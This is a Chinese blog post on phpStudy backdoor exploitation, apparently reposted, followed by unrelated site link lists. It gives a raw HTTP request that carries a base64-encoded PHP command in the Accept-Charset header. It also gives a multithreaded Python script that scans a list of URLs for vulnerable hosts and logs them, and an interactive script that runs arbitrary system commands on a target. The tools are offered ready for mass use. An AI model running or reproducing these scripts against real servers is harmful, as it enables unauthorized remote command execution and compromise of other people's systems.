编程 PHP

phpstudy后门rce批量利用脚本的实现

Posted in PHP onDecember 12, 2019

写两个一个批量检测的一个交互式shell的

暂时py 图形化的qt写出来..有点问题

后门包 :

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

phpstudy后门rce批量利用脚本的实现

执行那段写shell即可

phpstudy后门rce批量利用脚本的实现

晚上抽点空简单写个发包的py:

phpstudy后门rce批量利用脚本的实现

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import queue


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog：https://www.cnblogs.com/-qing-/==\n")
payload = "echo \"qing\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}



def write_shell(url,headers):
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

url = "http://xxx"
write_shell(url=url,headers=headers)

界面优化、改下多线程、批量读取文本文件后的代码:

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog：https://www.cnblogs.com/-qing-/==\n")




def write_shell(url):
  payload = "echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

# url = "http://xxx"
# write_shell(url=url,headers=headers)

def main():
  with open('url.txt','r') as f:
    lines = f.read().splitlines()
    task_pool=threadpool.ThreadPool(5)
    requests=threadpool.makeRequests(write_shell,lines)
  for req in requests:
    task_pool.putRequest(req)
    task_pool.wait() 
if __name__ == '__main__':
  main()


#线程队列部分
# th=[]
# th_num=10
# for x in range(th_num):
#     t=threading.Thread(target=write_shell)
#     th.append(t)
# for x in range(th_num):
#     th[x].start()
# for x in range(th_num):
#     th[x].join()

phpstudy后门rce批量利用脚本的实现

你也可以加上读取php文件的字典这个简单没啥说的

下一个是交互式shell

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool
import re

print("======Phpstudy Backdoor Exploit---os-shell============\n")
print("===========By Qing=================\n")
print("=====Blog：https://www.cnblogs.com/-qing-/==\n")



def os_shell(url,headers,payload):
  try:
    r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
    # print(r.text)
    res = re.findall("qing(.*?)qing",r.text,re.S)
    print("[ + ]===========The Response:==========[ + ]\n")
    res = "".join(res)
    print(res)
  except:
    print("[ - ]===========Failed! Timeout...==========[ - ]\n")

def main():
  url = input("input the Url , example:\"http://127.0.0.1/\"\n")
  payload = input("input the payload , default:echo system(\"whoami\");\n")
  de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"
  if payload.strip() == '':
    payload = de_payload
  payload = "echo \"qing\";"+payload+"echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
  }
  os_shell(url=url,headers=headers,payload=payload)
if __name__ == '__main__':
  main()

phpstudy后门rce批量利用脚本的实现

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持三水点靠木。

phpstudy后门rce批量利用脚本的实现

- Author -

卿先生

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

在字符串中把网址改成超级链接

Oct 09 PHP

一个PHP的String类代码

Apr 20 PHP

探讨:如何使用PhpDocumentor生成文档

Jun 25 PHP

php 删除cookie方法详解

Dec 01 PHP

php编写批量生成不重复的卡号密码代码

May 14 PHP

php 输入输出流详解及示例代码

Aug 25 PHP

PHP类型约束用法示例

Sep 28 PHP

php连接微软MSSQL(sql server)完全攻略

Nov 27 PHP

php实现微信支付之企业付款

May 30 PHP

PHP标准库(PHP SPL)详解

Mar 16 PHP

在Laravel 中实现是否关注的示例

Oct 22 PHP

laravel框架数据库操作、查询构建器、Eloquent ORM操作实例分析

Dec 20 PHP

PHP设计模式之数据访问对象模式（DAO）原理与用法实例分析

Dec 12 #PHP

PHP设计模式之建造者模式（Builder）原理与用法案例详解

Dec 12 #PHP

PHP设计模式之适配器模式（Adapter）原理与用法详解

Dec 12 #PHP

PHP学习记录之常用的魔术常量详解

Dec 12 #PHP

记Laravel调用Gin接口调用formData上传文件的实现方法

Dec 12 #PHP

PHP命名空间(namespace)原理与用法详解

Dec 11 #PHP

在 Laravel 6 中缓存数据库查询结果的方法

Dec 11 #PHP

You might like

Laravel 5框架学习之Laravel入门和新建项目

2015/04/07 PHP

PHP递归的三种常用方式

2019/02/28 PHP

自写的一个jQuery圆角插件

2010/10/26 Javascript

js传参数受特殊字符影响错误的解决方法

2013/10/21 Javascript

使用firebug进行调试javascript的示例

2013/12/16 Javascript

js操作输入框中选择内容兼容IE及其他主流浏览器

2014/04/22 Javascript

js获取元素外链样式的方法

2015/01/27 Javascript

基于JavaScript实现五子棋游戏

2020/08/26 Javascript

node.js微信小程序配置消息推送的实现

2019/02/13 Javascript

vue elementUI 表单校验功能之数组多层嵌套

2019/06/04 Javascript

ElementUI中el-tree节点的操作的实现

2020/02/27 Javascript

js数组相减简单示例【删除a数组所有与b数组相同元素】

2020/03/04 Javascript

[00:17]DOTA2荣耀之路5：It’s a disastah！

2018/05/28 DOTA

在Python中用has_key()方法查找键是否存在的教程

2015/05/21 Python

Python socket编程实例详解

2015/05/27 Python

Python base64编码解码实例

2015/06/21 Python

Python实现识别手写数字大纲

2018/01/29 Python

python脚本生成caffe train_list.txt的方法

2018/04/27 Python

python模块smtplib学习

2018/05/22 Python

Python定义函数功能与用法实例详解

2019/04/08 Python

Python爬虫爬取煎蛋网图片代码实例

2019/12/16 Python

python实现横向拼接图片

2020/03/23 Python

通过实例解析python and和or使用方法

2020/11/14 Python

Expedia瑞典官网：预订度假屋、酒店、汽车租赁、机票等

2021/01/23 全球购物

令人啧啧称赞的经理推荐信

2013/11/07 职场文书

大学毕业生最详细的自我评价分享

2013/11/18 职场文书

施工人员岗位职责

2013/12/12 职场文书

个人求职简历中英文自我评价

2013/12/16 职场文书

优秀教师先进事迹

2014/01/22 职场文书

五年后的职业生涯规划

2014/03/04 职场文书

党的群众路线教育实践活动实施方案

2014/10/31 职场文书

2014年护理部工作总结

2014/11/14 职场文书

老龙头导游词

2015/02/11 职场文书

2015年网络舆情工作总结

2015/07/24 职场文书

使用tensorflow 实现反向传播求导

2021/05/26 Python

Python内置包对JSON文件数据进行编码和解码

2022/04/12 Python